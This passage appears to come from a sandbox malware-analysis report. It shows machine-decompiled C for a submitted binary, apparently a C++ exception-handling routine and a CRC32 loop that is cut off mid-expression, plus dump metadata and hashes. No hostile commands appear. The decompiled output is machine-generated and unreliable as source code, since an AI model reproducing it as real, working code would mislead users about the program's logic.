                                                                          				signed int _t310;
                                                                          				signed int _t311;
                                                                          				signed int _t312;
                                                                          				signed int _t319;
                                                                          				signed int _t320;
                                                                          				signed int _t323;
                                                                          				signed int _t324;
                                                                          				signed int _t329;
                                                                          				signed int _t331;
                                                                          				intOrPtr _t385;
                                                                          				signed int _t398;
                                                                          				signed int _t402;
                                                                          				int _t406;
                                                                          				char* _t408;
                                                                          				void* _t410;
                                                                          				signed int* _t411;
                                                                          				intOrPtr* _t413;
                                                                          				signed int* _t414;
                                                                          				intOrPtr _t420;
                                                                          
                                                                          				_t402 = __esi;
                                                                          				_t398 = __edi;
                                                                          				_t324 = __ebx;
                                                                          				_push(__edi);
                                                                          				_push(__esi);
                                                                          				_t411 = _t410 - 0xbc;
                                                                          				_v72 = _t411;
                                                                          				_v80 =  &_v28;
                                                                          				_v88 = E00408B60;
                                                                          				_v84 = 0x40c51c;
                                                                          				_v76 = 0x409029;
                                                                          				 *_t411 =  &_v112;
                                                                          				E0040B460(__ebx, __edi, __esi, __ebx);
                                                                          				_v140 = 3;
                                                                          				_t215 = _a20 + 0x20;
                                                                          				_v144 = _a20 - 0x30;
                                                                          				_v132 = _t215;
                                                                          				if(_a4 != 1) {
                                                                          					L18:
                                                                          					 *_t411 =  &_v112;
                                                                          					E0040B540(_t324);
                                                                          					return _v140;
                                                                          				} else {
                                                                          					_t417 = _a8 - 6;
                                                                          					_t329 = _a16 ^ 0x474e5543;
                                                                          					if((((_a12 ^ 0x432b2b00 | _t329) & 0xffffff00 | _a8 == 0x00000006) & (_t215 & 0xffffff00 | _t417 == 0x00000000)) != 0) {
                                                                          						_v168 =  *((intOrPtr*)(_v144 + 0x18));
                                                                          						_v148 =  *((intOrPtr*)(_v144 + 0x20));
                                                                          						_t223 =  *((intOrPtr*)(_v144 + 0x24));
                                                                          						__eflags = _t223 - 1;
                                                                          						_v160 = _t223;
                                                                          						asm("sbb ecx, ecx");
                                                                          						_t331 = (_t329 & 0xfffffffe) + 3;
                                                                          						__eflags = _t331;
                                                                          						goto L13;
                                                                          					} else {
                                                                          						 *_t411 = _a24;
                                                                          						_v108 = 0xffffffff;
                                                                          						_t280 = E0040B660();
                                                                          						_v148 = _t280;
                                                                          						_v140 = 8;
                                                                          						if(_t280 == 0) {
                                                                          							goto L18;
                                                                          						} else {
                                                                          							_v108 = 0xffffffff;
                                                                          							_t398 = 0;
                                                                          							_t402 = 0;
                                                                          							_v156 = E00408940(_a24,  &_v60, _t280);
                                                                          							_t324 = 0;
                                                                          							_v52 = E00408730(_v40 & 0x000000ff, _a24);
                                                                          							 *_t411 = _a24;
                                                                          							_t286 = E0040B630();
                                                                          							_v160 = 0;
                                                                          							_t287 = _t286 - 1;
                                                                          							_v164 = _t287;
                                                                          							_t420 = _t287;
                                                                          							_v152 = 0;
                                                                          							_v168 = 0;
                                                                          							_v140 = 8;
                                                                          							if(_t420 < 0) {
                                                                          								goto L18;
                                                                          							} else {
                                                                          								if(_t420 != 0) {
                                                                          									do {
                                                                          										_v156 = E004087B0(_v156,  &_v116);
                                                                          										_t290 = E004087B0(_t289,  &_v120);
                                                                          										_t95 =  &_v164;
                                                                          										 *_t95 = _v164 - 1;
                                                                          										__eflags =  *_t95;
                                                                          										_v156 = _t290;
                                                                          									} while ( *_t95 != 0);
                                                                          									_t291 = _v120;
                                                                          									_v160 = _v116 + 1;
                                                                          									__eflags = _t291;
                                                                          									if(_t291 != 0) {
                                                                          										_t323 = _t291 + _v44 - 1;
                                                                          										__eflags = _t323;
                                                                          										_v152 = _t323;
                                                                          									}
                                                                          									_t331 = 0;
                                                                          									__eflags = _v160;
                                                                          									if(_v160 != 0) {
                                                                          										_t331 = 2;
                                                                          										__eflags = _v152;
                                                                          										if(_v152 != 0) {
                                                                          											__eflags = _a8 & 0x00000008;
                                                                          											_v173 = 0;
                                                                          											_v174 = 0;
                                                                          											if((_a8 & 0x00000008) == 0) {
                                                                          												__eflags = _a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00;
                                                                          												if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) != 0) {
                                                                          													goto L25;
                                                                          												} else {
                                                                          													_t306 =  *_v144;
                                                                          													goto L26;
                                                                          												}
                                                                          												L36:
                                                                          												__eflags = _v174;
                                                                          												if(_v174 == 0) {
                                                                          													__eflags = _v173 - 1;
                                                                          													asm("sbb ecx, ecx");
                                                                          													_t331 =  !_t331 & 0x00000002;
                                                                          												} else {
                                                                          													_t331 = 3;
                                                                          													_v168 = _v124;
                                                                          												}
                                                                          												goto L6;
                                                                          											} else {
                                                                          												L25:
                                                                          												_t306 = 0;
                                                                          												__eflags = 0;
                                                                          											}
                                                                          											L26:
                                                                          											_v172 = _t306;
                                                                          											while(1) {
                                                                          												_v156 = E00408800(_v152,  &_v124);
                                                                          												E00408800(_t308,  &_v128);
                                                                          												_t310 = _v124;
                                                                          												__eflags = _t310;
                                                                          												if(__eflags == 0) {
                                                                          													goto L27;
                                                                          												}
                                                                          												if(__eflags <= 0) {
                                                                          													_t402 = _v172;
                                                                          													__eflags = _t402;
                                                                          													if(_t402 == 0) {
                                                                          														_t324 = _v48;
                                                                          														E004087B0( !_t310 + _t324,  &_v136);
                                                                          														_t331 = _v136;
                                                                          														__eflags = _t331;
                                                                          													} else {
                                                                          														_t331 = _v132;
                                                                          														 *_t411 = _t310;
                                                                          														_v108 = 0xffffffff;
                                                                          														__eflags = E00408B00( &_v60, _t331, _v172);
                                                                          													}
                                                                          													if(__eflags != 0) {
                                                                          														goto L28;
                                                                          													} else {
                                                                          														goto L35;
                                                                          													}
                                                                          												} else {
                                                                          													_t319 = E00408A10( &_v60, _t310);
                                                                          													__eflags = _t319;
                                                                          													if(_t319 == 0) {
                                                                          														L35:
                                                                          														_v174 = 1;
                                                                          													} else {
                                                                          														_t398 = _v172;
                                                                          														__eflags = _t398;
                                                                          														if(_t398 == 0) {
                                                                          															L28:
                                                                          															_t311 = _v128;
                                                                          															__eflags = _t311;
                                                                          															if(_t311 != 0) {
                                                                          																_t312 = _t311 + _v156;
                                                                          																__eflags = _t312;
                                                                          																_v152 = _t312;
                                                                          																continue;
                                                                          															}
                                                                          														} else {
                                                                          															_v108 = 0xffffffff;
                                                                          															_t331 =  &_v132;
                                                                          															_t320 = E00408A90(_t319, _t324, _t331, _v172, _t398, _t402);
                                                                          															__eflags = _t320;
                                                                          															if(_t320 == 0) {
                                                                          																goto L28;
                                                                          															} else {
                                                                          																goto L35;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												goto L36;
                                                                          												L27:
                                                                          												_v173 = 1;
                                                                          												goto L28;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t331 = 1;
                                                                          								}
                                                                          								L6:
                                                                          								_v140 = 8;
                                                                          								if(_t331 == 0) {
                                                                          									goto L18;
                                                                          								} else {
                                                                          									if((_a8 & 0x00000001) == 0) {
                                                                          										L13:
                                                                          										__eflags = _a8 & 0x00000008;
                                                                          										if((_a8 & 0x00000008) != 0) {
                                                                          											L15:
                                                                          											__eflags = _t331 == 1;
                                                                          											if(_t331 == 1) {
                                                                          												_v108 = 0xffffffff;
                                                                          												E0040A430();
                                                                          												goto L50;
                                                                          											} else {
                                                                          												__eflags = _v168;
                                                                          												if(_v168 < 0) {
                                                                          													L50:
                                                                          													_v108 = 2;
                                                                          													E0040A460(_t398);
                                                                          													_t406 =  &_a20;
                                                                          													__eflags = _v108 - 1;
                                                                          													_v180 = _v104;
                                                                          													if(_v108 != 1) {
                                                                          														_v108 = 0;
                                                                          														E0040ACE0(_t324, _t402);
                                                                          														 *_t411 = _v180;
                                                                          														_v108 = 0xffffffff;
                                                                          														E0040BB20(_t324, _t398, _t402);
                                                                          														goto L52;
                                                                          													}
                                                                          													goto L53;
                                                                          												} else {
                                                                          													goto L17;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											__eflags = _a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00;
                                                                          											if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) == 0) {
                                                                          												__eflags = _t331 == 1;
                                                                          												if(_t331 == 1) {
                                                                          													L52:
                                                                          													_t260 = _v144 + 0x30;
                                                                          													__eflags = _t260;
                                                                          													 *_t411 = _t260;
                                                                          													E0040ABD0(_t324, _t398, _t402);
                                                                          													 *_t411 =  *(_v144 + 0xc);
                                                                          													_v108 = 0xffffffff;
                                                                          													E0040A3D0(_t324, _t398, _t402);
                                                                          													L53:
                                                                          													 *_t411 = _v180;
                                                                          													E0040ABD0(_t324, _t398, _t402);
                                                                          													_v108 = 1;
                                                                          													E0040A430();
                                                                          													_t413 = _t411 - 0xa8;
                                                                          													_v300 =  &_v232;
                                                                          													 *_t413 =  &_v332;
                                                                          													_v220 = _t324;
                                                                          													_v216 = _t402;
                                                                          													_v212 = _t398;
                                                                          													_v308 = E00408B60;
                                                                          													_v304 = 0x40c52c;
                                                                          													_v296 = 0x409120;
                                                                          													_v292 = _t413;
                                                                          													E0040B460(_t324, _t398, _t402, _t406);
                                                                          													 *_t413 = _v200;
                                                                          													E0040ABD0(_t324, _t398, _t402);
                                                                          													_t234 = _v200 - 0x30;
                                                                          													_v336 =  *((intOrPtr*)(_t234 + 0x20));
                                                                          													_v340 =  *((intOrPtr*)(_t234 + 0x18));
                                                                          													_v344 =  *((intOrPtr*)(_t234 + 0xc));
                                                                          													_v328 = 2;
                                                                          													_v272 =  *((intOrPtr*)(_t234 + 0x24));
                                                                          													 *_t413 =  *((intOrPtr*)(_t234 + 8));
                                                                          													L0040A450(_t398);
                                                                          													_t408 =  &_v184;
                                                                          													__eflags = _v328 - 1;
                                                                          													_v348 = _v324;
                                                                          													if(_v328 != 1) {
                                                                          														_v128 = 0;
                                                                          														E0040ACE0(_t324, _t402);
                                                                          														_v128 = 0;
                                                                          														E0040ACE0(_t324, _t402);
                                                                          														_v128 = 0xffffffff;
                                                                          														 *_t413 = _v148;
                                                                          														E0040BB20(_t324, _t398, _t402);
                                                                          													}
                                                                          													 *_t413 = _v148;
                                                                          													E0040ABD0(_t324, _t398, _t402);
                                                                          													_t240 =  *((intOrPtr*)(E0040A900(_t324, _t398, _t402)));
                                                                          													_v128 = 1;
                                                                          													_v152 = _t240;
                                                                          													_v156 = _t240 + 0x50;
                                                                          													E00408940(0,  &_v80, _v136);
                                                                          													 *_t413 = _v140;
                                                                          													_t246 = E00408B00( &_v80, _v156,  *_v152);
                                                                          													__eflags = _t246;
                                                                          													if(_t246 != 0) {
                                                                          														L59:
                                                                          														E0040A580();
                                                                          													} else {
                                                                          														_v128 = 1;
                                                                          														 *_t413 = _v140;
                                                                          														_t251 = E00408B00( &_v80, 0, 0x4132c0);
                                                                          														__eflags = _t251;
                                                                          														if(_t251 != 0) {
                                                                          															 *_t413 = 4;
                                                                          															_t252 = E0040A600(_t324, _t398, _t402);
                                                                          															_t402 = E0040A370;
                                                                          															_t324 = 0x4132c0;
                                                                          															 *_t252 = 0x4134f4;
                                                                          															_v368 = E0040A370;
                                                                          															_v372 = 0x4132c0;
                                                                          															 *_t413 = _t252;
                                                                          															E0040A510();
                                                                          															goto L59;
                                                                          														}
                                                                          													}
                                                                          													_v128 = 1;
                                                                          													 *_t413 = _v144;
                                                                          													E0040A3D0(_t324, _t398, _t402);
                                                                          													0;
                                                                          													0;
                                                                          													_push(_t408);
                                                                          													_t414 = _t413 - 8;
                                                                          													_t249 = _v372;
                                                                          													__eflags = _t249;
                                                                          													if(_t249 != 0) {
                                                                          														 *_t414 = _t249;
                                                                          														L0040C1C8();
                                                                          														return _t249;
                                                                          													}
                                                                          													return _t249;
                                                                          												} else {
                                                                          													__eflags = _v168;
                                                                          													if(_v168 < 0) {
                                                                          														_v108 = 0xffffffff;
                                                                          														E00408940(_a24,  &_v60, _v148);
                                                                          														 *((intOrPtr*)(_v144 + 0x24)) = E00408730(_v40 & 0x000000ff, _a24);
                                                                          													}
                                                                          													L17:
                                                                          													_v200 = 0;
                                                                          													_t324 = 7;
                                                                          													_t266 = _v144 + 0x30;
                                                                          													__eflags = _t266;
                                                                          													_v196 = _t266;
                                                                          													 *_t411 = _a24;
                                                                          													_v108 = 0xffffffff;
                                                                          													E0040B610();
                                                                          													_v200 = 1;
                                                                          													_v196 = _v168;
                                                                          													 *_t411 = _a24;
                                                                          													E0040B610();
                                                                          													_v200 = _v160;
                                                                          													 *_t411 = _a24;
                                                                          													E0040B640();
                                                                          													_v140 = 7;
                                                                          													goto L18;
                                                                          												}
                                                                          											} else {
                                                                          												goto L15;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										if(_t331 == 2) {
                                                                          											goto L18;
                                                                          										} else {
                                                                          											if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) == 0) {
                                                                          												_t300 = _v144;
                                                                          												 *(_t300 + 0x18) = _v168;
                                                                          												 *(_t300 + 0x1c) = _v152;
                                                                          												 *((intOrPtr*)(_t300 + 0x20)) = _v148;
                                                                          												_t385 = _v144;
                                                                          												 *(_t385 + 0x28) = _v132;
                                                                          												 *(_t385 + 0x24) = _v160;
                                                                          											}
                                                                          											_v140 = 6;
                                                                          											 *_t411 =  &_v112;
                                                                          											E0040B540(_t324);
                                                                          											return _v140;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}





























































































                                                                          0x00408b60
                                                                          0x00408b60
                                                                          0x00408b60
                                                                          0x00408b66
                                                                          0x00408b67
                                                                          0x00408b69
                                                                          0x00408b6f
                                                                          0x00408b72
                                                                          0x00408b78
                                                                          0x00408b7f
                                                                          0x00408b86
                                                                          0x00408b8d
                                                                          0x00408b90
                                                                          0x00408ba0
                                                                          0x00408ba9
                                                                          0x00408bb0
                                                                          0x00408bb6
                                                                          0x00408bb9
                                                                          0x00408def
                                                                          0x00408df2
                                                                          0x00408df5
                                                                          0x00408e0a
                                                                          0x00408bbf
                                                                          0x00408bbf
                                                                          0x00408bd2
                                                                          0x00408bdf
                                                                          0x00408d32
                                                                          0x00408d3e
                                                                          0x00408d44
                                                                          0x00408d47
                                                                          0x00408d4a
                                                                          0x00408d50
                                                                          0x00408d55
                                                                          0x00408d55
                                                                          0x00000000
                                                                          0x00408be5
                                                                          0x00408be8
                                                                          0x00408beb
                                                                          0x00408bf2
                                                                          0x00408bf7
                                                                          0x00408c04
                                                                          0x00408c0a
                                                                          0x00000000
                                                                          0x00408c10
                                                                          0x00408c10
                                                                          0x00408c1f
                                                                          0x00408c21
                                                                          0x00408c28
                                                                          0x00408c32
                                                                          0x00408c3c
                                                                          0x00408c42
                                                                          0x00408c45
                                                                          0x00408c4a
                                                                          0x00408c50
                                                                          0x00408c56
                                                                          0x00408c5c
                                                                          0x00408c5e
                                                                          0x00408c64
                                                                          0x00408c6a
                                                                          0x00408c70
                                                                          0x00000000
                                                                          0x00408c76
                                                                          0x00408c76
                                                                          0x00408e10
                                                                          0x00408e1e
                                                                          0x00408e27
                                                                          0x00408e2c
                                                                          0x00408e2c
                                                                          0x00408e2c
                                                                          0x00408e32
                                                                          0x00408e32
                                                                          0x00408e3d
                                                                          0x00408e41
                                                                          0x00408e47
                                                                          0x00408e49
                                                                          0x00408e50
                                                                          0x00408e50
                                                                          0x00408e51
                                                                          0x00408e51
                                                                          0x00408e5d
                                                                          0x00408e5f
                                                                          0x00408e61
                                                                          0x00408e6d
                                                                          0x00408e72
                                                                          0x00408e74
                                                                          0x00408e7a
                                                                          0x00408e7e
                                                                          0x00408e85
                                                                          0x00408e8c
                                                                          0x00408f98
                                                                          0x00408f9a
                                                                          0x00000000
                                                                          0x00408fa0
                                                                          0x00408fa6
                                                                          0x00000000
                                                                          0x00408fa6
                                                                          0x00408f1d
                                                                          0x00408f1d
                                                                          0x00408f24
                                                                          0x00408ffe
                                                                          0x00409005
                                                                          0x00409009
                                                                          0x00408f2a
                                                                          0x00408f2d
                                                                          0x00408f32
                                                                          0x00408f32
                                                                          0x00000000
                                                                          0x00408e92
                                                                          0x00408e92
                                                                          0x00408e92
                                                                          0x00408e92
                                                                          0x00408e92
                                                                          0x00408e94
                                                                          0x00408e94
                                                                          0x00408ebc
                                                                          0x00408eca
                                                                          0x00408ed3
                                                                          0x00408ed8
                                                                          0x00408edb
                                                                          0x00408edd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408edf
                                                                          0x00408fb0
                                                                          0x00408fb6
                                                                          0x00408fb8
                                                                          0x00408fe2
                                                                          0x00408fef
                                                                          0x00408ff4
                                                                          0x00408ffa
                                                                          0x00408fba
                                                                          0x00408fba
                                                                          0x00408fbd
                                                                          0x00408fc6
                                                                          0x00408fd5
                                                                          0x00408fd5
                                                                          0x00408fd7
                                                                          0x00000000
                                                                          0x00408fdd
                                                                          0x00000000
                                                                          0x00408fdd
                                                                          0x00408ee5
                                                                          0x00408eea
                                                                          0x00408eef
                                                                          0x00408ef1
                                                                          0x00408f16
                                                                          0x00408f16
                                                                          0x00408ef3
                                                                          0x00408ef3
                                                                          0x00408ef9
                                                                          0x00408efb
                                                                          0x00408ea7
                                                                          0x00408ea7
                                                                          0x00408eaa
                                                                          0x00408eac
                                                                          0x00408eb4
                                                                          0x00408eb4
                                                                          0x00408eb6
                                                                          0x00000000
                                                                          0x00408eb6
                                                                          0x00408efd
                                                                          0x00408efd
                                                                          0x00408f0a
                                                                          0x00408f0d
                                                                          0x00408f12
                                                                          0x00408f14
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408f14
                                                                          0x00408efb
                                                                          0x00408ef1
                                                                          0x00000000
                                                                          0x00408ea0
                                                                          0x00408ea0
                                                                          0x00000000
                                                                          0x00408ea0
                                                                          0x00408ebc
                                                                          0x00408e74
                                                                          0x00408c7c
                                                                          0x00408c7c
                                                                          0x00408c7c
                                                                          0x00408c81
                                                                          0x00408c88
                                                                          0x00408c8e
                                                                          0x00000000
                                                                          0x00408c94
                                                                          0x00408c98
                                                                          0x00408d58
                                                                          0x00408d58
                                                                          0x00408d5c
                                                                          0x00408d77
                                                                          0x00408d77
                                                                          0x00408d78
                                                                          0x00409011
                                                                          0x00409018
                                                                          0x00000000
                                                                          0x00408d7e
                                                                          0x00408d84
                                                                          0x00408d86
                                                                          0x0040901d
                                                                          0x0040901d
                                                                          0x00409024
                                                                          0x00409029
                                                                          0x0040902c
                                                                          0x00409033
                                                                          0x00409039
                                                                          0x0040903b
                                                                          0x00409042
                                                                          0x0040904d
                                                                          0x00409050
                                                                          0x00409057
                                                                          0x00000000
                                                                          0x00409057
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408d86
                                                                          0x00408d5e
                                                                          0x00408d6f
                                                                          0x00408d71
                                                                          0x00408f40
                                                                          0x00408f41
                                                                          0x0040905c
                                                                          0x00409062
                                                                          0x00409062
                                                                          0x00409065
                                                                          0x00409068
                                                                          0x00409076
                                                                          0x00409079
                                                                          0x00409080
                                                                          0x00409085
                                                                          0x0040908b
                                                                          0x0040908e
                                                                          0x00409093
                                                                          0x0040909a
                                                                          0x004090a6
                                                                          0x004090ac
                                                                          0x004090b2
                                                                          0x004090b5
                                                                          0x004090b8
                                                                          0x004090bb
                                                                          0x004090be
                                                                          0x004090c5
                                                                          0x004090cc
                                                                          0x004090d3
                                                                          0x004090d6
                                                                          0x004090de
                                                                          0x004090e1
                                                                          0x004090e9
                                                                          0x004090ef
                                                                          0x004090f5
                                                                          0x004090fe
                                                                          0x0040910a
                                                                          0x00409111
                                                                          0x00409114
                                                                          0x00409117
                                                                          0x00409120
                                                                          0x00409123
                                                                          0x0040912a
                                                                          0x00409130
                                                                          0x00409132
                                                                          0x00409139
                                                                          0x0040913e
                                                                          0x00409145
                                                                          0x0040914a
                                                                          0x00409157
                                                                          0x0040915a
                                                                          0x0040915a
                                                                          0x00409166
                                                                          0x00409169
                                                                          0x00409173
                                                                          0x00409178
                                                                          0x00409182
                                                                          0x0040918b
                                                                          0x00409193
                                                                          0x004091aa
                                                                          0x004091b2
                                                                          0x004091b7
                                                                          0x004091b9
                                                                          0x0040920a
                                                                          0x0040920a
                                                                          0x004091bb
                                                                          0x004091bb
                                                                          0x004091cd
                                                                          0x004091d5
                                                                          0x004091da
                                                                          0x004091dc
                                                                          0x004091de
                                                                          0x004091e5
                                                                          0x004091ea
                                                                          0x004091ef
                                                                          0x004091f4
                                                                          0x004091fa
                                                                          0x004091fe
                                                                          0x00409202
                                                                          0x00409205
                                                                          0x00000000
                                                                          0x00409205
                                                                          0x004091dc
                                                                          0x0040920f
                                                                          0x0040921c
                                                                          0x0040921f
                                                                          0x0040922a
                                                                          0x0040922e
                                                                          0x00409230
                                                                          0x00409233
                                                                          0x00409236
                                                                          0x00409239
                                                                          0x0040923b
                                                                          0x0040923d
                                                                          0x00409240
                                                                          0x00000000
                                                                          0x00409240
                                                                          0x00409246
                                                                          0x00408f47
                                                                          0x00408f4d
                                                                          0x00408f4f
                                                                          0x00408f55
                                                                          0x00408f68
                                                                          0x00408f7f
                                                                          0x00408f7f
                                                                          0x00408d8c
                                                                          0x00408d99
                                                                          0x00408d9d
                                                                          0x00408da2
                                                                          0x00408da2
                                                                          0x00408da5
                                                                          0x00408dac
                                                                          0x00408daf
                                                                          0x00408db6
                                                                          0x00408dc1
                                                                          0x00408dc5
                                                                          0x00408dcc
                                                                          0x00408dcf
                                                                          0x00408dda
                                                                          0x00408de1
                                                                          0x00408de4
                                                                          0x00408de9
                                                                          0x00000000
                                                                          0x00408de9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408d71
                                                                          0x00408c9e
                                                                          0x00408ca1
                                                                          0x00000000
                                                                          0x00408ca7
                                                                          0x00408cba
                                                                          0x00408cbc
                                                                          0x00408cc8
                                                                          0x00408cd1
                                                                          0x00408cda
                                                                          0x00408ce0
                                                                          0x00408ce6
                                                                          0x00408cef
                                                                          0x00408cef
                                                                          0x00408cf7
                                                                          0x00408d00
                                                                          0x00408d03
                                                                          0x00408d18
                                                                          0x00408d18
                                                                          0x00408ca1
                                                                          0x00408c98
                                                                          0x00408c8e
                                                                          0x00408c70
                                                                          0x00408c0a
                                                                          0x00408bdf

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: abort
                                                                          • String ID:
                                                                          • API String ID: 4206212132-0
                                                                          • Opcode ID: a82c55dfd39a0c610aa2bb486ca2b702f981955c47fa771b32c863d3c877bdfa
                                                                          • Instruction ID: fb9014d8d90ad197938c66955a6f40d0fed81886d76c48f73c17b708fb267f63
                                                                          • Opcode Fuzzy Hash: a82c55dfd39a0c610aa2bb486ca2b702f981955c47fa771b32c863d3c877bdfa
                                                                          • Instruction Fuzzy Hash: 8AE1FD74A003198FDB24DF65C98079EBBB1BF44314F1486AED898AB381DB389D85CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00408054(signed int _a4, signed char* _a8, intOrPtr _a12) {
                                                                          				signed char* _t61;
                                                                          				signed char* _t62;
                                                                          				signed char* _t63;
                                                                          				signed char* _t64;
                                                                          				signed char* _t65;
                                                                          				signed char* _t66;
                                                                          				signed char* _t67;
                                                                          				signed char* _t68;
                                                                          				signed int _t69;
                                                                          				signed char _t70;
                                                                          				intOrPtr _t98;
                                                                          
                                                                          				_t69 = _a4;
                                                                          				_t61 = _a8;
                                                                          				_t98 = _a12;
                                                                          				if(_t61 != 0) {
                                                                          					_t70 =  !_t69;
                                                                          					if(_t98 <= 7) {
                                                                          						L4:
                                                                          						if(_t98 == 0) {
                                                                          							L7:
                                                                          							return  !_t70;
                                                                          						}
                                                                          						do {
                                                                          							_t70 = _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4);
                                                                          							_t61 =  &(_t61[1]);
                                                                          							_t98 = _t98 - 1;
                                                                          						} while (_t98 != 0);
                                                                          						goto L7;
                                                                          					}
                                                                          					do {
                                                                          						_t62 =  &(_t61[1]);
                                                                          						_t63 =  &(_t62[1]);
                                                                          						_t64 =  &(_t63[1]);
                                                                          						_t65 =  &(_t64[1]);
                                                                          						_t66 =  &(_t65[1]);
                                                                          						_t67 =  &(_t66[1]);
                                                                          						_t68 =  &(_t67[1]);
                                                                          						_t70 = (((((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 